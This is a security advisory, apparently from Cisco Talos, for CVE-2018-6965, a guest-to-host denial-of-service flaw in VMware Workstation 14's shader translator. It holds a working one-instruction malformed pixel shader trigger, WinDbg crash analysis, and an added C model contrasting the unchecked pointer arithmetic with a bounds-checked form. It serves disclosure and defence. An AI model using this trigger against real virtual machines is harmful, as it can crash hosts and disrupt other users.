CVE-2018-6965
An exploitable denial-of-service vulnerability exists in VMware Workstation 14. A specially crafted pixel shader can cause a read access violation, resulting in, at least, a denial of service. An attacker can provide a specially crafted shader file (in either binary or text form) to trigger this vulnerability. The vulnerability can be triggered from the VMware guest, and it affects the VMware host: the vmware-vmx.exe process on the host crashes.
Tested version: VMware Workstation 14 (14.1.1.28517) on Windows 8.1, with Windows 10 x64 as the guest VM
CVSSv3 score: 6.5 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H
CWE-823: Use of Out-of-range Pointer Offset
This vulnerability can be triggered by supplying a malformed pixel shader (in text or binary form) from inside a VMware guest operating system. The trigger requires only guest user-mode privileges and results in a memory denial of service against the vmware-vmx.exe process on the host. A very simple pixel shader (fragment shader) consisting of a single instruction is enough to trigger it.
Pixel shader data used to trigger the bug:
ps_4_0
00000000: 0x000000a4 - 0x000000b8 mov o1.xyzw, r1.xyzw
As you can see, the only instruction in this case is mov (the SM4 component-wise move). Note that, unlike in a typical valid shader, the dcl_input, dcl_output and dcl_temps declarations are missing.
Output from the vmware-vmx-debug.exe process:
--- input ---
ps_4_0
MOV OUTPUT[1].xyzw, TEMP[1].xyzw
FRAG
0: MOV OUT[1], TEMP[1]
1: END
ASSERT bora\mks\hostops\DX11\DX11ShaderTrans.c:85
ASSERT bora\mks\hostops\DX11\DX11ShaderTrans.c:85
PANIC: ASSERT bora\mks\hostops\DX11\DX11ShaderTrans.c:85
Win32 object usage: GDI 12, USER 22
(191c.1180): Unknown exception - code cafebabe (first chance)
CoreDump: Writing minidump to K:\virtual_machines\win10_shader\windows_10_x64_uefi\vmware-vmx-debug.dmp
ModLoad: 00007ffb`da020000 00007ffb`da08c000 C:\Windows\SYSTEM32\verifier.dll
Dumping core for vcpu-0
Panic in progress... ungrabbing
As you can see, the vmware-vmx-debug.exe process reports that the ASSERT macro was triggered (PANIC: ASSERT bora\mks\hostops\DX11\DX11ShaderTrans.c:85) because a malformed pixel shader was supplied, and the entire virtual machine is terminated. The ASSERT macro is only compiled into DEBUG builds, so this check is absent from the retail build (vmware-vmx.exe), which instead crashes at:
(1b8c.64): Access violation - code c0000005 (!!! second chance !!!)
*** ERROR: Module load completed but symbols could not be loaded for J:\vmware\x64\vmware-vmx.exe
vmware_vmx+0x308ad0:
00007ff7`fc988ad0 418b38 mov edi,dword ptr [r8] ds:000012d3`485917d0=????????
0:011> r
rax=00000000ffffffff rbx=000000f34856cbf0 rcx=000011dfffffee20
rdx=0000000000000000 rsi=000000f34856d964 rdi=000000f34856def0
rip=00007ff7fc988ad0 rsp=000000f34856c8e0 rbp=000000f34856c9e0
r8=000012d3485917d0 r9=000000f34856c9c0 r10=000000000000000f
r11=000000000000004f r12=000000f34856d958 r13=0000000000000000
r14=000000f34856def0 r15=00007ff7fcf059c0
iopl=0 nv up ei pl nz na pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010200
Here is the trace of the pointer computation (the 32-bit register index in rax is 0xffffffff; it is scaled by the 0x11E0 element size and added to the base pointer in r8):
0x318AD0: initial r8=0x0000000ae4882af0 r14=0x0000000ae485e030 rcx=0x0000000000000004
0x318AC7: after imul rcx, rax, 11E0h; rcx=0x000011dfffffee20 rax=0x00000000ffffffff
0x318ACA: add r8, rcx; r8=0x000011eae4881910 rcx=0x000011dfffffee20
0x318AD0: reading from @r8=0x000011eae4881910
(133c.1a90): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
vmware_vmx+0x308ad0:
00007ff7`fc988ad0 418b38 mov edi,dword ptr [r8] ds:000011ea`e4881910=????????
In short, a shader can be constructed so that the shader translator computes an invalid pointer, which it then dereferences for a read operation. The read faults because the pointer is invalid, which results in a denial of service but could potentially be turned into an information disclosure vulnerability.
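As an added illustration (not code from the advisory or from VMware), the following C model reproduces the pointer arithmetic shown in the trace above and places the unchecked pattern beside the bounds check that would reject the shader instead. The register-table layout, the lookup function, NOT_FOUND and MAX_TEMPS are assumptions; only the 0x11E0 stride and the r8/rax values come from the trace.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
/* Assumed model of the translator's register table. Only the element stride
 * (imul rcx, rax, 11E0h) and the register values come from the trace; the
 * table layout, MAX_TEMPS and the lookup function are hypothetical. */
#define REG_RECORD_SIZE 0x11E0u
#define NOT_FOUND       0xffffffffu
#define MAX_TEMPS       16u

/* Address arithmetic seen at 0x318AC7..0x318AD0: a 32-bit index is
 * zero-extended, scaled by the record size and added to the table base. */
uint64_t record_address(uint64_t table_base, uint32_t index)
{
    return table_base + (uint64_t)index * REG_RECORD_SIZE;
}

/* Resolve TEMP[n] against the dcl_temps count. The advisory's shader has no
 * dcl_temps, so declared_temps is 0 and every lookup yields NOT_FOUND. */
uint32_t lookup_temp(uint32_t declared_temps, uint32_t n)
{
    return (n < declared_temps) ? n : NOT_FOUND;
}

/* Unchecked pattern matching the crash: the failed lookup flows straight into
 * the pointer computation (CWE-823) and the result is dereferenced. */
uint64_t resolve_temp_unchecked(uint64_t table_base, uint32_t declared_temps, uint32_t n)
{
    return record_address(table_base, lookup_temp(declared_temps, n));
}

/* Hardened form: validate the index before any arithmetic and reject the
 * shader instead of forming an out-of-range pointer. */
bool resolve_temp_checked(uint64_t table_base, uint32_t declared_temps,
                          uint32_t n, uint64_t *out)
{
    uint32_t idx = lookup_temp(declared_temps, n);
    if (idx == NOT_FOUND || idx >= MAX_TEMPS)
        return false;   /* undeclared register: fail translation */
    *out = record_address(table_base, idx);
    return true;
}

int main(void)
{
    uint64_t base = 0x0000000ae4882af0ULL, addr = 0;   /* r8 from the trace */
    printf("unchecked TEMP[1] -> %#llx\n", (unsigned long long)resolve_temp_unchecked(base, 0, 1));
    printf("checked   TEMP[1] -> %s\n", resolve_temp_checked(base, 0, 1, &addr) ? "ok" : "rejected");
    return 0;
}
```

The unchecked path reproduces the faulting r8 value from the trace (0x000011eae4881910); the checked path fails translation for the same shader.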
0:011> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\SYSTEM32\igdusc64.dll -
GetUrlPageData2 (WinHttp) failed: 12007.
DUMP_CLASS: 2
DUMP_QUALIFIER: 0
FAULTING_IP:
vmware_vmx+308ad0
00007ff7`fc988ad0 418b38 mov edi,dword ptr [r8]
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 00007ff7fc988ad0 (vmware_vmx+0x0000000000308ad0)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 0000000000000000
Parameter[1]: 00001263d19515f0
Attempt to read from address 00001263d19515f0
FAULTING_THREAD: 0000089c
DEFAULT_BUCKET_ID: INVALID_POINTER_READ
PROCESS_NAME: vmware-vmx.exe
ERROR_CODE: (NTSTATUS) 0xc0000005 - <Unable to get error code text>
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - <Unable to get error code text>
EXCEPTION_CODE_STR: c0000005
EXCEPTION_PARAMETER1: 0000000000000000
EXCEPTION_PARAMETER2: 00001263d19515f0
FOLLOWUP_IP:
vmware_vmx+308ad0
00007ff7`fc988ad0 418b38 mov edi,dword ptr [r8]
READ_ADDRESS: 00001263d19515f0
WATSON_BKT_PROCSTAMP: 5a53448e
WATSON_BKT_PROCVER: 14.1.1.28517
PROCESS_VER_PRODUCT: VMware Workstation
WATSON_BKT_MODULE: vmware-vmx.exe
WATSON_BKT_MODSTAMP: 5a53448e
WATSON_BKT_MODOFFSET: 308ad0
WATSON_BKT_MODVER: 14.1.1.28517
MODULE_VER_PRODUCT: VMware Workstation
BUILD_VERSION_STRING: 6.3.9600.17415 (winblue_r4.141028-1500)
MODLIST_WITH_TSCHKSUM_HASH: c658fafa9c6204d32cb9b7029d65df448d2c9b1b
MODLIST_SHA1_HASH: 4a8d1514c2e92391e3c2c084830d5be0b634be75
NTGLOBALFLAG: 0
APPLICATION_VERIFIER_FLAGS: 0
PRODUCT_TYPE: 1
SUITE_MASK: 272
DUMP_TYPE: fe
ANALYSIS_SESSION_HOST: SPLINTER
ANALYSIS_SESSION_TIME: 03-06-2018 10:24:43.0873
ANALYSIS_VERSION: 10.0.15063.468 amd64fre
THREAD_ATTRIBUTES:
OS_LOCALE: PLK
PROBLEM_CLASSES:
ID: [0n292]
Type: [@ACCESS_VIOLATION]
Class: Addendum
Scope: BUCKET_ID
Name: Omit
Data: Omit
PID: [Unspecified]
TID: [0x89c]
Frame: [0] : vmware_vmx
ID: [0n264]
Type: [INVALID_POINTER_READ]
Class: Primary
Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
BUCKET_ID
Name: Add
Data: Omit
PID: [Unspecified]
TID: [0x89c]
Frame: [0] : vmware_vmx
BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_READ
PRIMARY_PROBLEM_CLASS: APPLICATION_FAULT
LAST_CONTROL_TRANSFER: from 00007ff7fc98a43f to 00007ff7fc988ad0
STACK_TEXT:
00000083`d192c700 00007ff7`fc98a43f : 00000083`d192dd10 00000000`00000000 00000000`00000000 00000000`00000000 : vmware_vmx+0x308ad0
00000083`d192c890 00007ff7`fc9b62f4 : 00000083`d20b1de0 00000083`d192dd10 00000000`00000000 00000000`0002000a : vmware_vmx+0x30a43f
00000083`d192d740 00007ff7`fc97c645 : 00000083`d1975f28 00000000`00000001 00000083`d2167b50 00000000`0000001c : vmware_vmx+0x3362f4
00000083`d192d850 00007ff7`fc8e3518 : 00000000`00000000 00000083`d2157f00 00000000`00000001 00007ff7`fcabb233 : vmware_vmx+0x2fc645
00000083`d197ef40 00007ff7`fc8e4f88 : 00000000`00000000 00007ff7`fd26e600 00000083`d5a2ac20 00000083`d197f340 : vmware_vmx+0x263518
00000083`d197f000 00007ff7`fc8e3a87 : 00000083`d2157f00 00000000`00000006 00000000`00000006 00007ff7`fd26e620 : vmware_vmx+0x264f88
00000083`d197f860 00007ff7`fc8e26f1 : 00000000`00000000 00000000`00000006 00000083`d2157f00 00000000`ffff8000 : vmware_vmx+0x263a87
00000083`d197f8b0 00007ff7`fc84685b : 00000000`00000001 00000083`d197fa30 00000000`00000028 00000083`d2036880 : vmware_vmx+0x2626f1
00000083`d197f8f0 00007ff7`fc7e1cf2 : 00000000`00000001 00000000`00000003 00000083`d197fa30 00000000`00000080 : vmware_vmx+0x1c685b
00000083`d197f930 00007ff7`fc7e00b3 : 00000083`d197fb38 00000000`00000040 00000000`00000000 00000000`00000001 : vmware_vmx+0x161cf2
00000083`d197fab0 00007ff7`fc738070 : 00000083`5033d580 00000000`00000000 00000000`00000001 00000000`00000000 : vmware_vmx+0x1600b3
00000083`d197fae0 00007ff7`fcbc283e : 00000000`0000000b 00007ff7`00000000 00000000`0000000a 00000083`501177b0 : vmware_vmx+0xb8070
00000083`d197fb30 00007ffc`06db13d2 : 00000000`00000000 00007ff7`fcbc2770 00000000`00000000 00000000`00000000 : vmware_vmx+0x54283e
00000083`d197fbc0 00007ffc`08a254f4 : 00007ffc`06db13b0 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x22
00000083`d197fbf0 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x34
THREAD_SHA1_HASH_MOD_FUNC: fabc8a15b8308031de6c6f3f3e38f264374c0991
THREAD_SHA1_HASH_MOD_FUNC_OFFSET: f10e48540897893630a7e8de120f464184134145
THREAD_SHA1_HASH_MOD: fe41d85eed2e8932bf60f9b6a3ab05a6ff3dda2e
FAULT_INSTR_CODE: 41388b41
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: vmware_vmx+308ad0
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: vmware_vmx
IMAGE_NAME: vmware-vmx.exe
DEBUG_FLR_IMAGE_TIMESTAMP: 5a53448e
STACK_COMMAND: ~11s ; kb
FAILURE_BUCKET_ID: INVALID_POINTER_READ_c0000005_vmware-vmx.exe!Unknown
BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_READ_vmware_vmx+308ad0
FAILURE_EXCEPTION_CODE: c0000005
FAILURE_IMAGE_NAME: vmware-vmx.exe
BUCKET_ID_IMAGE_STR: vmware-vmx.exe
FAILURE_MODULE_NAME: vmware_vmx
BUCKET_ID_MODULE_STR: vmware_vmx
FAILURE_FUNCTION_NAME: Unknown
BUCKET_ID_FUNCTION_STR: Unknown
BUCKET_ID_OFFSET: 308ad0
BUCKET_ID_MODTIMEDATESTAMP: 5a53448e
BUCKET_ID_MODCHECKSUM: 1395bfd
BUCKET_ID_MODVER_STR: 14.1.1.28517
BUCKET_ID_PREFIX_STR: APPLICATION_FAULT_INVALID_POINTER_READ_
FAILURE_PROBLEM_CLASS: APPLICATION_FAULT
FAILURE_SYMBOL_NAME: vmware-vmx.exe!Unknown
WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/vmware-vmx.exe/14.1.1.28517/5a53448e/vmware-vmx.exe/14.1.1.28517/5a53448e/c0000005/00308ad0.htm?Retriage=1
TARGET_TIME: 2018-03-06T09:25:24.000Z
OSBUILD: 9600
OSSERVICEPACK: 17415
SERVICEPACK_NUMBER: 0
OS_REVISION: 0
OSPLATFORM_TYPE: x64
OSNAME: Windows 8.1
OSEDITION: Windows 8.1 WinNt SingleUserTS
USER_LCID: 0
OSBUILD_TIMESTAMP: 2014-10-29 03:45:30
BUILDDATESTAMP_STR: 141028-1500
BUILDLAB_STR: winblue_r4
BUILDOSVER_STR: 6.3.9600.17415
ANALYSIS_SESSION_ELAPSED_TIME: 9e88
ANALYSIS_SOURCE: UM
FAILURE_ID_HASH_STRING: um:invalid_pointer_read_c0000005_vmware-vmx.exe!unknown
FAILURE_ID_HASH: {286e64e4-ca0a-1e3c-78f8-4ea042647b09}
Followup: MachineOwner
---------
2018-03-20 - Vendor Disclosure
2018-06-28 - Public Release
Discovered by a member of Cisco Talos